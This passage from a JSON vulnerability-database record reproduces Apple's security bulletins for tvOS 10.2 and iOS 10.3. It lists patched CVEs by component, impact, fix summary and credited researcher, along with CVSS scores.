This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A 
memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. 
This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed 
through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. 
This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-20T10:43:59", "title": "About the security content of tvOS 10.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2479", "CVE-2017-2461", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2492", "CVE-2017-2395", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2390", 
"CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2491", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-06-20T10:43:59", "id": "APPLE:HT207601", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T19:33:06", "description": "# About the security content of iOS 10.3\n\nThis document describes the security content of iOS 10.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. 
This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: 
iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian 
Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. 
This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. 
This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. 
This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and 
